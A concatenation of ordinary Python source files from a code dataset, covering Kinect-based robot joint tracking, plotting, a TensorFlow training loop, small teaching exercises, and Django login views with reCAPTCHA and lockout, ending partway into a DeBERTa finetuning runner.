tf.euler_from_quaternion(KneeQuat, 'syzx')\r\n\r\n LKneeRoll = KneeAngles[1]\r\n LKneeYaw = KneeAngles[0]\r\n \r\n else:\r\n LKneeRoll = 
None\r\n LKneeYaw = None\r\n \r\n else:\r\n LKneeRoll = None\r\n LKneeYaw = None\r\n\r\n LHipPitch = None\r\n LHipRoll = None \r\n \r\n # Head angles\r\n if (Joints[PyKinectV2.JointType_Neck].TrackingState == 2) and (Joints[PyKinectV2.JointType_Head].TrackingState == 2):\r\n NeckPos = Joints[PyKinectV2.JointType_Neck].Position\r\n HeadPos = Joints[PyKinectV2.JointType_Head].Position\r\n\r\n Diference = np.array([(HeadPos.x - NeckPos.x), (HeadPos.y - NeckPos.y), (HeadPos.z - NeckPos.z)]) # Pitch angle is calculates with head and Neck coordinates.\r\n \r\n HeadPitch = np.arctan2(-Diference[2], Diference[1])\r\n \r\n else:\r\n HeadPitch = None\r\n \r\n # Right Shoulder angles.\r\n if (Joints[PyKinectV2.JointType_ShoulderRight].TrackingState == 2) and (Joints[PyKinectV2.JointType_ElbowRight].TrackingState == 2):\r\n ElbowRQuat = self.Quaternion(Orientations, PyKinectV2.JointType_ElbowRight, PyKinectV2.JointType_SpineShoulder) \r\n ShoulderRAngles = tf.euler_from_quaternion(ElbowRQuat, 'syzx')\r\n \r\n RShoulderPitch = Add_Angles(-np.pi/2, ShoulderRAngles[2])\r\n RShoulderRoll = -ShoulderRAngles[1]\r\n \r\n # Right Elbow angles.\r\n if Joints[PyKinectV2.JointType_WristRight].TrackingState == 2:\r\n WristRQuat = self.Quaternion(Orientations, PyKinectV2.JointType_WristRight, PyKinectV2.JointType_ElbowRight) \r\n ElbowRAngles = tf.euler_from_quaternion(WristRQuat, 'syzx') \r\n \r\n RElbowYaw = -Add_Angles(np.pi, -ShoulderRAngles[0])\r\n RElbowRoll = ElbowRAngles[1]\r\n \r\n # Right Wrist angle.\r\n if ENABLE_WRIST:\r\n \r\n WristQuat = self.Quaternion(Orientations, PyKinectV2.JointType_WristRight)\r\n WristAngles = tf.euler_from_quaternion(WristQuat, 'syzx')\r\n \r\n RWristYawE = WristAngles[0]\r\n RWristYawP = -Add_Angles(np.pi/2, -ElbowRAngles[0])\r\n \r\n else:\r\n RWristYawE = None\r\n RWristYawP = None\r\n \r\n # Right Hand state.\r\n if (Joints[PyKinectV2.JointType_HandTipRight].TrackingState == 2) and (Joints[PyKinectV2.JointType_ThumbRight].TrackingState == 2):\r\n if Body.hand_right_state == 3:\r\n HandR = 2 # Hand closed.\r\n elif Body.hand_right_state == 2:\r\n HandR = 1 # Hand opened.\r\n else:\r\n HandR = 3 # Unknown state.\r\n \r\n else:\r\n HandR = None\r\n\r\n else:\r\n RElbowYaw = None\r\n RElbowRoll = None\r\n\r\n RWristYawE = None\r\n RWristYawP = None\r\n \r\n HandR = None\r\n \r\n else:\r\n RShoulderPitch = None\r\n RShoulderRoll = None\r\n \r\n RElbowYaw = None\r\n RElbowRoll = None\r\n\r\n RWristYawE = None\r\n RWristYawP = None\r\n \r\n HandR = None\r\n\r\n # Left Shoulder angles.\r\n if (Joints[PyKinectV2.JointType_ShoulderLeft].TrackingState == 2) and (Joints[PyKinectV2.JointType_ElbowLeft].TrackingState == 2):\r\n ElbowLQuat = self.Quaternion(Orientations, PyKinectV2.JointType_ElbowLeft, PyKinectV2.JointType_SpineShoulder) \r\n ShoulderLAngles = tf.euler_from_quaternion(ElbowLQuat, 'syzx') \r\n \r\n LShoulderPitch = Add_Angles(-np.pi/2, ShoulderLAngles[2])\r\n LShoulderRoll = -ShoulderLAngles[1]\r\n\r\n # Left Elbow angles.\r\n if Joints[PyKinectV2.JointType_WristLeft].TrackingState == 2:\r\n WristLQuat = self.Quaternion(Orientations, PyKinectV2.JointType_WristLeft, PyKinectV2.JointType_ElbowLeft) \r\n ElbowLAngles = tf.euler_from_quaternion(WristLQuat, 'syzx') \r\n \r\n LElbowYaw = -Add_Angles(np.pi, -ShoulderLAngles[0])\r\n LElbowRoll = ElbowLAngles[1]\r\n \r\n # Left Wrist angles.\r\n if ENABLE_WRIST:\r\n WristQuat = self.Quaternion(Orientations, PyKinectV2.JointType_WristLeft)\r\n WristAngles = tf.euler_from_quaternion(WristQuat, 'syzx')\r\n \r\n LWristYawE = 
WristAngles[0]\r\n LWristYawP = -Add_Angles(np.pi/2, -ElbowLAngles[0])\r\n \r\n else:\r\n LWristYawE = None\r\n LWristYawP = None\r\n\r\n # Left Hand state.\r\n if (Joints[PyKinectV2.JointType_HandTipLeft].TrackingState == 2) and (Joints[PyKinectV2.JointType_ThumbLeft].TrackingState == 2):\r\n if Body.hand_left_state == 3:\r\n HandL = 2 # Hand closed.\r\n elif Body.hand_left_state == 2:\r\n HandL = 1 # Hand opened. \r\n else:\r\n HandL = 3 # Unknown state.\r\n \r\n else:\r\n HandL = None\r\n \r\n else:\r\n LElbowYaw = None\r\n LElbowRoll = None\r\n \r\n LWristYawE = None\r\n LWristYawP = None\r\n \r\n HandL = None\r\n \r\n else:\r\n LShoulderPitch = None\r\n LShoulderRoll = None\r\n\r\n LElbowYaw = None\r\n LElbowRoll = None\r\n \r\n LWristYawE = None\r\n LWristYawP = None\r\n \r\n HandL = None\r\n \r\n if Type == 'Emotion':\r\n if HeadPitch == None or RShoulderRoll == None or RShoulderPitch == None or RElbowYaw == None or RElbowRoll == None or RWristYawE == None or HandR == None or LShoulderRoll == None or LShoulderPitch == None or LElbowYaw == None or LElbowRoll == None or LWristYawE == None or HandL or WaistRoll == None or WaistPitch == None or RHipRoll == None or RHipPitch == None or RKneeYaw == None or RKneeRoll == None or LHipRoll == None or LHipPitch == None or LKneeYaw == None or LKneeRoll == None: \r\n return None\r\n \r\n else:\r\n return np.transpose([[HeadPitch], \r\n [RShoulderRoll], [RShoulderPitch], [RElbowYaw], [RElbowRoll], [RWristYawE], [HandR], \r\n [LShoulderRoll], [LShoulderPitch], [LElbowYaw], [LElbowRoll], [LWristYawE], [HandL],\r\n [WaistRoll], [WaistPitch],\r\n [RHipRoll], [RHipPitch], [RKneeYaw], [RKneeRoll],\r\n [LHipRoll], [LHipPitch], [LKneeYaw], [LKneeRoll]]) \r\n \r\n if Type == 'Pepper':\r\n if HeadPitch == None or RShoulderRoll == None or RShoulderPitch == None or RElbowYaw == None or RElbowRoll == None or RWristYawP == None or HandR == None or LShoulderRoll == None or LShoulderPitch == None or LElbowYaw == None or LElbowRoll == None or LWristYawP == None or HandL or WaistRoll == None or WaistPitch == None:\r\n return None\r\n \r\n else:\r\n return np.transpose([[HeadPitch], \r\n [RShoulderRoll], [RShoulderPitch], [RElbowYaw], [RElbowRoll], [RWristYawP], [HandR], \r\n [LShoulderRoll], [LShoulderPitch], [LElbowYaw], [LElbowRoll], [LWristYawP], [HandL],\r\n [WaistRoll], [WaistPitch]]) \r\n \r\n def DrawBodyBones(self, Joints, JointsPoints, Color, Joint0, Joint1):\r\n '''\r\n Function that draw the skeleton in a frame.\r\n '''\r\n Joint0State = Joints[Joint0].TrackingState;\r\n Joint1State = Joints[Joint1].TrackingState;\r\n\r\n # If is not correct the tracking:\r\n if (Joint0State == PyKinectV2.TrackingState_NotTracked) or (Joint1State == PyKinectV2.TrackingState_NotTracked): \r\n return\r\n\r\n if (Joint0State == PyKinectV2.TrackingState_Inferred) and (Joint1State == PyKinectV2.TrackingState_Inferred):\r\n return\r\n\r\n # If the skeleton tracking is correct:\r\n Start = (JointsPoints[Joint0].x, JointsPoints[Joint0].y) # Start point coordinates.\r\n End = (JointsPoints[Joint1].x, JointsPoints[Joint1].y) # Final point coordinates.\r\n\r\n # Draw a line with start and final points.\r\n try:\r\n if (Joint0State == PyKinectV2.TrackingState_Inferred) or (Joint1State == PyKinectV2.TrackingState_Inferred):\r\n draw.line(self.FrameSurface, Color[1], Start, End, 8)\r\n \r\n else:\r\n draw.line(self.FrameSurface, Color[0], Start, End, 8)\r\n \r\n except: \r\n pass\r\n\r\n def Quaternion(self, Orientations, Joint, ParentJoint = None):\r\n '''\r\n Function that computes 
the quaternion matrix using the coordinates of\r\n each joint get with the Kinect V2 Camera.\r\n ''' \r\n Quat = Orientations[Joint].Orientation \r\n QArray = np.array([Quat.w, Quat.x, Quat.y, Quat.z]) \r\n \r\n # Quat matrix with two joints.\r\n if ParentJoint is not None:\r\n QuatParent = Orientations[ParentJoint].Orientation \r\n QuatArrayParent = np.array([QuatParent.w, QuatParent.x, QuatParent.y, QuatParent.z]) \r\n QuatRelativ = tf.quaternion_multiply(tf.quaternion_inverse(QuatArrayParent), QArray) # Compute the relative quat.\r\n \r\n return QuatRelativ\r\n \r\n else: \r\n return QArray\r\n \r\n def RunKinect(self, Type):\r\n '''\r\n Function that do the tracking process and draw the skeleton in a frame\r\n compatible with the cv2 format.\r\n ''' \r\n if self.Kinect.has_new_color_frame():\r\n Frame = self.Kinect.get_last_color_frame() # Save the image get with the Kinect V2 Camera.\r\n self.DrawColorFrame(Frame, self.FrameSurface) \r\n Frame = None\r\n \r\n if self.Kinect.has_new_body_frame(): \r\n self.Bodies = self.Kinect.get_last_body_frame() # Save the bodies present in the image.\r\n\r\n if self.Bodies is not None:\r\n Body = self.SelectNearestBody() # Select the nearest body.\r\n\r\n if Body is not None: # Draw and compute the body's joint angles.\r\n Joints = Body.joints\r\n JointsPoints = self.Kinect.body_joints_to_color_space(Joints)\r\n Orientations = Body.joint_orientations \r\n self.DrawBody(Joints, JointsPoints, SkeletonColors)\r\n AnglesSecuence = self.Angles(Joints, Orientations, Body, Type)\r\n \r\n return self.FrameSurface, AnglesSecuence\r\n \r\n else:\r\n return self.FrameSurface, None\r\n \r\n else:\r\n return self.FrameSurface, None\r\n \r\n else:\r\n return self.FrameSurface, None\r\n \r\n else:\r\n return self.FrameSurface, None\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Complet Project/Wrappers/Kinect_Tracking.py","file_name":"Kinect_Tracking.py","file_ext":"py","file_size_in_byte":25754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"202733693","text":"# Standard Python modules used in HeighHo\nfrom HeighHoPy import *\n\n# HeighHo modules\nfrom Constants.all import X, Y, Z, L, R\nfrom Discretization.all import *\nfrom Display.all import *\nfrom Operators.all import *\n\n#==========================================================================\ndef plot_isolines(phi, xyzn, d, title):\n#--------------------------------------------------------------------------\n \n # Unpack tuples\n xn, yn, zn = xyzn \n \n # Pick coordinates for plotting (xp, yp) and values for plotting\n if d == X:\n ip = ceil(xn.size/2)\n xp, yp = meshgrid(yn, zn)\n zp = transpose(phi[ip,:,:], (1,0))\n xlab = \"y\"\n ylab = \"z\"\n \n elif d == Y:\n jp = ceil(yn.size/2)\n xp, yp = meshgrid(xn, zn)\n zp = transpose(phi[:,jp,:], (1,0))\n xlab = \"x\"\n ylab = \"z\"\n \n elif d == Z:\n kp = ceil(zn.size/2)\n xp, yp = meshgrid(xn, yn)\n zp = transpose(phi[:,:,kp], (1,0))\n xlab = \"x\"\n ylab = \"y\"\n\n # Set levels and normalize the colors \n levels = linspace( zp.min(), zp.max(), 21)\n norm = cm.colors.Normalize( vmax=zp.max(), vmin=zp.min() )\n \n plt.figure()\n plt.gca(aspect='equal')\n plt.contour(xp,yp,zp, levels, cmap=plt.cm.rainbow, norm=norm)\n plt.axis( [xp.min(), xp.max(), yp.min(), yp.max()] )\n plt.xlabel(xlab)\n plt.ylabel(ylab)\n plt.title(title)\n plt.grid()\n plt.show()\n\n return # end of 
function","sub_path":"PYTHON/Display/plot_isolines.py","file_name":"plot_isolines.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"602892161","text":"import tensorflow as tf\nimport numpy as np\nimport cv2 as cv\nimport random\nimport math\nfrom sklearn.utils import shuffle\nimport pdb\nimport re\nimport data_reader as reader\n\nimport networks as nets\nimport utils\nimport params\n\nSHOW_IMAGES = False \nIS_RESTORE = tf.train.latest_checkpoint(params.folder_data) != None \n \nparams.show_params() \ndata_reader = reader.DataReader('./data/train', './data/validation', './data/test')\n \t \n# training \ndim_depth = int(data_reader.dim_depth / params.scale)\n\nbatch_size = 32\n\ninput = tf.placeholder(tf.float32, (batch_size, data_reader.dim_patch, dim_depth, params.num_channels), name='input')\ntarget = tf.placeholder(tf.float32, (batch_size, data_reader.dim_patch, data_reader.dim_depth, params.num_channels), name='target') \n \noutput = params.network_architecture_D(input, params.kernel_size) \nprint('output shape is ', output.shape)\nif(params.LOSS == params.L1_LOSS): # \n\tloss = tf.reduce_mean(tf.abs(output - target)) \nif(params.LOSS == params.L2_LOSS):\n\tloss = tf.reduce_mean(tf.square(output - target)) \n\t \nglobal_step = tf.Variable(0, trainable=False)\nstarter_learning_rate = params.learning_rate \nlearning_rate = tf.train.exponential_decay(starter_learning_rate, global_step,\n 100, 1, staircase=True)\nopt = tf.train.AdamOptimizer(learning_rate).minimize(loss, global_step=global_step)\n\nconfig = tf.ConfigProto(\n device_count = {'GPU': 1}\n ) \nsess = tf.Session(config = config)\nsess.run(tf.global_variables_initializer()) \n\ntotal_loss_placeholder = tf.placeholder(tf.float32, shape=[], name=\"total_loss\")\nlr_placeholder = tf.placeholder(tf.float32, shape=[], name=\"total_loss\")\nssim_placeholder = tf.placeholder(tf.float32, shape=[], name=\"ssim_placeholder\")\npsnr_placeholder = tf.placeholder(tf.float32, shape=[], name=\"psnr_placeholder\")\ntf.summary.scalar('loss', total_loss_placeholder) \ntf.summary.scalar('learning_rate', lr_placeholder) \ntf.summary.scalar('ssim', ssim_placeholder) \ntf.summary.scalar('psnr', psnr_placeholder) \nmerged = tf.summary.merge_all()\nwriter = tf.summary.FileWriter('train.log', sess.graph)\n \nsaver = tf.train.Saver(max_to_keep=0) \nstart_epoch = 0\n\nif(IS_RESTORE):\n print('===========restoring from ' + tf.train.latest_checkpoint(params.folder_data))\n saver.restore(sess,tf.train.latest_checkpoint(params.folder_data))\n start_epoch = re.findall(r'\\d+', tf.train.latest_checkpoint(params.folder_data))\n start_epoch = int(start_epoch[0]) + 1 \n \nfor epoch in range(start_epoch, params.num_epochs):\n\tbatch_loss = 0 \n\tnum_images = 0 \n\tnum_iterations = math.ceil(data_reader.num_train_images/batch_size) \n\tssim_epoch = 0\n\tpsnr_epoch = 0 \n\tfor i in range(0, num_iterations): \n\t\t input_, target_ = data_reader.get_next_batch_train(i, batch_size) \n\t\t num_images += target_.shape[0]\n\t\t cost, _, lr, gl, predicted_images = sess.run([loss, opt, learning_rate, global_step, output], feed_dict={input: input_ , target: target_}) \n\t\t cv.imshow('i', input_[10] / 255) \n\t\t cv.imshow('t', target_[10] / 255) \n\t\t cv.imshow('o', predicted_images[10] / 255)\n\t\t cv.waitKey(1000)\n\t\t batch_loss += cost * target_.shape[0]\n\t\t ssim_batch, psnr_batch = utils.compute_ssim_psnr_batch(predicted_images, target_)\n\t\t ssim_epoch += 
ssim_batch\n\t\t psnr_epoch += psnr_batch\n\t\t print(\"Epoch/Iteration/Global Iteration: {}/{}/{} ...\".format(epoch, i, gl),\"Training loss: {:.8f}\".format(batch_loss/(num_images*data_reader.dim_depth)), \"Learning rate: {:.8f}\".format(lr)) \n\t\t \n\tmerged_ = sess.run(merged, feed_dict={total_loss_placeholder: batch_loss/(num_images*data_reader.dim_depth), ssim_placeholder: ssim_epoch/num_images, psnr_placeholder: psnr_epoch/num_images, lr_placeholder : lr } )\n\twriter.add_summary(merged_, epoch)\n\t \n\tprint('saving checkpoint...') \n\tsaver.save(sess, params.folder_data + params.ckpt_name + str(epoch))\t\n\nsess.close()","sub_path":"cnn/D-resize/old_code/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"600237059","text":"import numpy as np\nimport math\n\n# User-based collaborative filtering\n'''\nUser-item matrix:\na matrix of how much each of N users likes each of M items\ni: number of users j: number of items\n'''\nUser = 4\nGoods = 3\n\narr1 = np.array([0.11, 0.20, 0.0]) # user 1's preference for the items\narr2 = np.array([0.81, 0.0, 0.0]) # user 2's preference for the items\narr3 = np.array([0.0, 0.88, 0.74]) # user 3's preference for the items\narr4 = np.array([0.0, 0.0, 0.42]) # user 4's preference for the items\n\n# 'user-item' preference matrix\nx = np.full([User, Goods], [arr1, arr2, arr3, arr4], dtype=float)\n# Pad the 'user-item' preference matrix with zeros so that it can be dot-multiplied with us later\n# xten = np.full([User, User], [np.concatenate((arr1, [0])), np.concatenate((arr2, [0])), np.concatenate((arr3, [0])), np.concatenate((arr4, [0]))], dtype=float)\n# Transpose of x; the transpose gives the other users' preferences for the items, used to compute similarity with the original users\nxT = x.transpose()\nprint(xT)\n\n# item-to-item matrix\ny = np.dot(xT, x)\nprint(y)\n\n# user similarity matrix\nus = np.full([Goods, Goods], 0.0, dtype=float)\n\n# Use y to compute us: each pairwise similarity (i, j) is obtained by normalizing with the diagonal entries\nfor i in range(Goods):\n for j in range(Goods):\n us[i][j] = round(y[i][j] / (math.sqrt(y[i][i]) * math.sqrt(y[j][j])), 3)\n \nprint(us)\n\n# Combine the user similarity matrix with the original preference matrix; this shows whether items the current user likes are also liked by other users\nusp = y / us\nprint(usp)\n\nusSum = np.sum(us, axis=1)\n\n# used for normalization\nusr = np.full((Goods, Goods), [[usSum[0]], [usSum[1]], [usSum[2]]])\nprint(usr)\n\n# Normalized preference matrix: through x (the known preference matrix) we can predict a matrix of what other users also like\np = usp / usr\nprint(p)","sub_path":"linear_algebra/demo_collaborative_filtering_2.py","file_name":"demo_collaborative_filtering_2.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"93337460","text":"\"\"\"\n2. Capital Quiz\nWrite a program that creates a dictionary containing the U.S. states as keys and their capitals as values. \n(Use the Internet to get a list of the states and their capitals.) The program\nshould then randomly quiz the user by displaying the name of a state and asking the user\nto enter that state’s capital. The program should keep a count of the number of correct and\nincorrect responses. (As an alternative to the U.S. 
states, the program can use the names of\ncountries and their capitals.)\n\"\"\"\n# import libraries\nimport random\n\n# define a dictionary of states and their respective capitals\ncapital_dic={\n 'Alabama': 'Montgomery',\n 'Alaska': 'Juneau',\n 'Arizona':'Phoenix',\n 'Arkansas':'Little Rock',\n 'California': 'Sacramento',\n 'Colorado':'Denver',\n 'Connecticut':'Hartford',\n 'Delaware':'Dover',\n 'Florida': 'Tallahassee',\n 'Georgia': 'Atlanta',\n 'Hawaii': 'Honolulu',\n 'Idaho': 'Boise',\n 'Illinois': 'Springfield',\n 'Indiana': 'Indianapolis',\n 'Iowa': 'Des Moines',\n 'Kansas': 'Topeka',\n 'Kentucky': 'Frankfort',\n 'Louisiana': 'Baton Rouge',\n 'Maine': 'Augusta',\n 'Maryland': 'Annapolis',\n 'Massachusetts': 'Boston',\n 'Michigan': 'Lansing',\n 'Minnesota': 'St. Paul',\n 'Mississippi': 'Jackson',\n 'Missouri': 'Jefferson City',\n 'Montana': 'Helena',\n 'Nebraska': 'Lincoln',\n 'Nevada': 'Carson City',\n 'New Hampshire': 'Concord',\n 'New Jersey': 'Trenton',\n 'New Mexico': 'Santa Fe',\n 'New York': 'Albany',\n 'North Carolina': 'Raleigh',\n 'North Dakota': 'Bismarck',\n 'Ohio': 'Columbus',\n 'Oklahoma': 'Oklahoma City',\n 'Oregon': 'Salem',\n 'Pennsylvania': 'Harrisburg',\n 'Rhode Island': 'Providence',\n 'South Carolina': 'Columbia',\n 'South Dakota': 'Pierre',\n 'Tennessee': 'Nashville',\n 'Texas': 'Austin',\n 'Utah': 'Salt Lake City',\n 'Vermont': 'Montpelier',\n 'Virginia': 'Richmond',\n 'Washington': 'Olympia',\n 'West Virginia': 'Charleston',\n 'Wisconsin': 'Madison',\n 'Wyoming': 'Cheyenne' \n}\n### initialize variables\nuser_input = \"\" # guess from user\nnum_wrong = 0 # number of questions answered incorrectly\nnum_right = 0 # number of questions answered correctly\n\n# create while loop to loop through the states\nwhile len(capital_dic) > 0:\n # get a random state from the capital_dic dictionary\n state = random.choice(list(capital_dic.keys()))\n \n # prompt user to enter the capital of the randomly picked state\n user_input = input(f'What is the capital of {state}: ')\n \n # if user guess is correct, increase num_right by 1\n if user_input == capital_dic[state]:\n print(\"Correct!\")\n num_right += 1\n else: # increase num_wrong by 1\n print(\"Incorrect!\")\n num_wrong += 1\n \n # remove the state from the capital_dic dictionary so it cannot be chosen again\n del capital_dic[state]\n\n# print out the number right and the number wrong\nprint(f'You got {num_right} right and {num_wrong} wrong!')","sub_path":"Class_Practice_Exercises/Dictionaries_Sets/Dict_Set_Ex_2.py","file_name":"Dict_Set_Ex_2.py","file_ext":"py","file_size_in_byte":3017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"131168072","text":"class Student:\n def __init__(self, name, college_id, gpa):\n self.name = name\n self.college_id = college_id\n self.gpa = gpa\n\n def __str__(self):\n return f'Name: {self.name}, id: {self.college_id}, GPA: {self.gpa}'\n\ndef main():\n alice = Student('Alice', 'aa1234aa', 4.0)\n bob = Student('Bob', 'bb1234bb', 3.5)\n jim = Student('Jim', 'cc1234cc', 3.0)\n\n print(alice.name)\n print(bob.college_id)\n print(jim.gpa)\n\n print(alice)\n print(bob)\n print(jim)\n\nmain()\n","sub_path":"classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"285996473","text":"from time import time\nstart = time()\n\nimport numpy as np\nimport os\n\nfrom tqdm import tqdm\nimport datetime\n\nimport 
matplotlib.pyplot as plt\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import f1_score\nfrom sklearn.metrics import confusion_matrix\nimport logging\n\nfrom classifiers import *\nfrom FeatureSelection import *\n\nnp.random.seed(0)\n\ntry:\n data = np.load(\"../Data/vectorized_data.npz\")\nexcept:\n os.system(\"python clean_data.py\")\n data = np.load(\"../Data/vectorized_data.npz\")\n\ntrain_tfidf,train_labels = data['arr_0'], data['arr_1']\n\n# Import PC\ntrain_PC = np.load(\"data_dump/train_data_tfidf_PC_2343.npy\")\n\ntrain_PC = train_tfidf\n\nvalidation_PC = train_PC[-400:,:]\nval_labels = train_labels[-400:]\n\ntrain_PC = train_PC[:-400,:]\ntrain_labels = train_labels[:-400]\n\n# Experiment details\nos.chdir(\"log/\")\n\nfeature_selection = 'None'\nalgorithm = 'GNB'\nruntime = 'Gaussian Naive Bayes with default parameters. All features used.\\n \\\nValidation set has 400 points.'\n\nlog_name = 'GNB_'+str(datetime.datetime.now()).replace(' ','_')\\\n.replace(':','_').split(\".\")[0]+'.log'\n\nlogging.basicConfig(filename = log_name, level=logging.DEBUG)\nlogging.info('Feature_selection = ' + feature_selection)\nlogging.info('Algorithm = ' + algorithm)\nlogging.info('Runtime = ' + runtime)\n\n# Experiment code\nclassifier = GNB()\nclassifier.train(train_PC,train_labels)\n\ntrain_predict = classifier.predict(train_PC)\nval_predict = classifier.predict(validation_PC)\n\ntf1 = f1_score(train_labels,train_predict,average='macro')\nvf1 = f1_score(val_labels,val_predict,average='macro')\n\nlogging.info('Train F1 = {} \\t Validation F1 = {}'.format(tf1,vf1))\n\nlogging.info(\"Time to run : {} s.\".format(time()-start))\n","sub_path":"project/Analysis/src/experiments_gnb.py","file_name":"experiments_gnb.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"466240688","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('game', '0007_auto_20150324_0227'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='game',\n name='gameCreator',\n field=models.TextField(default=None, null=True),\n ),\n ]\n","sub_path":"GoFish/game/migrations/0008_auto_20150324_0237.py","file_name":"0008_auto_20150324_0237.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"538592870","text":"from django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render, reverse, redirect\nfrom django.contrib.auth.views import login as login_view\nfrom django.contrib.auth import authenticate, login\nfrom .forms import UserCreationForm\nfrom .decorators import check_recaptcha\nfrom axes.models import AccessAttempt\nfrom axes.utils import reset\n\n\n# Create your views here.\n# def get_client_ip(req):\n# x_forwarded_for = req.META.get('HTTP_X_FORWARDED_FOR')\n# if x_forwarded_for:\n# print('HTTP_X_FORWARDED_FOR IP is {}'.format(x_forwarded_for))\n# return x_forwarded_for.split(',')[-1].strip()\n# elif req.META.get('HTTP_X_REAL_IP'):\n# real_ip = req.META.get('HTTP_X_REAL_IP')\n# print('HTTP_X_REAL_IP IP is {}'.format(real_ip))\n# return real_ip\n# else:\n# remote_addr = req.META.get('REMOTE_ADDR')\n# print('REMOTE_ADDR IP is {}'.format(remote_addr))\n# return remote_addr\n\ndef check_login_attempts(request):\n if request.method == 'POST':\n username = 
request.POST.get('username')\n        attempts = AccessAttempt.objects.filter(\n            username=username).first()\n        if attempts is not None and attempts.failures_since_start >= 3:\n            return JsonResponse({'captcha': True})\n        return JsonResponse({'captcha': False})\n    return HttpResponse(status=405)\n\n\n@check_recaptcha\ndef user_login(request):\n    if request.method == 'GET':\n        return render(request, 'budget_auth_app/login.html')\n    if request.method == 'POST':\n        user = authenticate(username=request.POST.get('username'),\n                            password=request.POST.get('password'))\n        if request.POST.get(\n                'g-recaptcha-response') and request.recaptcha_is_valid:\n            if not request.POST.get('remember'):\n                request.session.set_expiry(0)\n            if user is not None:\n                reset(username=request.POST.get('username'))\n            return login_view(request,\n                              template_name='budget_auth_app/login.html')\n        elif request.POST.get(\n                'g-recaptcha-response') is not None and\\\n                not request.recaptcha_is_valid:\n            captcha_error = 'reCAPTCHA validation error, please try again'\n            user_axes = AccessAttempt.objects.get(\n                username=request.POST.get('username'))\n            attempts = user_axes.failures_since_start\n            # increase login attempts\n            user_axes.failures_since_start = attempts + 1\n            user_axes.save()\n            if user_axes.failures_since_start >= 10:\n                return redirect(reverse('auth:locked'))\n            return render(request, 'budget_auth_app/login.html',\n                          {'captcha_error': captcha_error})\n        else:\n            if not request.POST.get('remember'):\n                request.session.set_expiry(0)\n            if user is not None:\n                reset(username=request.POST.get('username'))\n            return login_view(request,\n                              template_name='budget_auth_app/login.html')\n    return HttpResponse(status=405)\n\n\n# ToDo Add link for password reinstatement in the login form\n\n@check_recaptcha\ndef user_registration(request):\n    if request.method == 'GET':\n        return render(request, 'budget_auth_app/register.html')\n    if request.method == 'POST':\n        form = UserCreationForm(request.POST)\n        if form.is_valid() and request.recaptcha_is_valid:\n            form.save()\n            user = authenticate(username=form.cleaned_data['email'],\n                                password=form.cleaned_data['password1'])\n            login(request, user)\n            if not request.POST.get('remember'):\n                request.session.set_expiry(0)\n            return redirect(reverse('budget:main'))\n        if not request.recaptcha_is_valid:\n            captcha_error = 'reCAPTCHA validation error, please try again'\n            return render(request, 'budget_auth_app/register.html',\n                          {'captcha_error': captcha_error})\n        print(form.errors.values())\n        return render(request, 'budget_auth_app/register.html',\n                      {'errors': form.errors.values()})\n    return HttpResponse(status=405)\n\n\ndef user_locked(request):\n    if request.method == 'GET':\n        return render(request, 'budget_auth_app/locked.html')\n    return HttpResponse(status=405)\n","sub_path":"budget_auth_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"261939678","text":"# Copyright (c) Microsoft, Inc. 
2020\n#\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\n#\n# Author: penhe@microsoft.com\n# Date: 01/25/2020\n#\n\n\"\"\"DeBERTa finetuning runner.\"\"\"\n\nimport os\nfrom collections import OrderedDict, Mapping, Sequence\nimport argparse\nimport random\nimport time\n\nimport numpy as np\nimport math\nimport torch\nimport json\nfrom torch.utils.data import DataLoader\nfrom ..deberta import GPT2Tokenizer\nfrom ..utils import *\nfrom ..utils import xtqdm as tqdm\nfrom .task_registry import tasks\n\nfrom ..training import DistributedTrainer, initialize_distributed, batch_to, set_random_seed,kill_children\nfrom ..data import DistributedBatchSampler, SequentialSampler, BatchSampler, AsyncDataLoader\n\ndef create_model(args, num_labels, model_class_fn):\n # Prepare model\n rank = getattr(args, 'rank', 0)\n init_model = args.init_model if rank<1 else None\n model = model_class_fn(init_model, args.model_config, num_labels=num_labels, \\\n drop_out=args.cls_drop_out, \\\n pre_trained = args.pre_trained)\n if args.fp16:\n model = model.half()\n\n return model\n\ndef train_model(args, model, device, train_data, eval_data):\n total_examples = len(train_data)\n num_train_steps = int(len(train_data)*args.num_train_epochs / args.train_batch_size)\n logger.info(\" Training batch size = %d\", args.train_batch_size)\n logger.info(\" Num steps = %d\", num_train_steps)\n\n def data_fn(trainer):\n return train_data, num_train_steps, None\n\n def eval_fn(trainer, model, device, tag):\n results = run_eval(trainer.args, model, device, eval_data, tag, steps=trainer.trainer_state.steps)\n eval_metric = np.mean([v[0] for k,v in results.items() if 'train' not in k])\n return eval_metric\n\n def loss_fn(trainer, model, data):\n _, loss = model(**data)\n return loss.mean(), data['input_ids'].size(0)\n\n trainer = DistributedTrainer(args, model, device, data_fn, loss_fn = loss_fn, eval_fn = eval_fn, dump_interval = args.dump_interval)\n trainer.train()\n\ndef merge_distributed(data_list, max_len=None):\n merged = []\n def 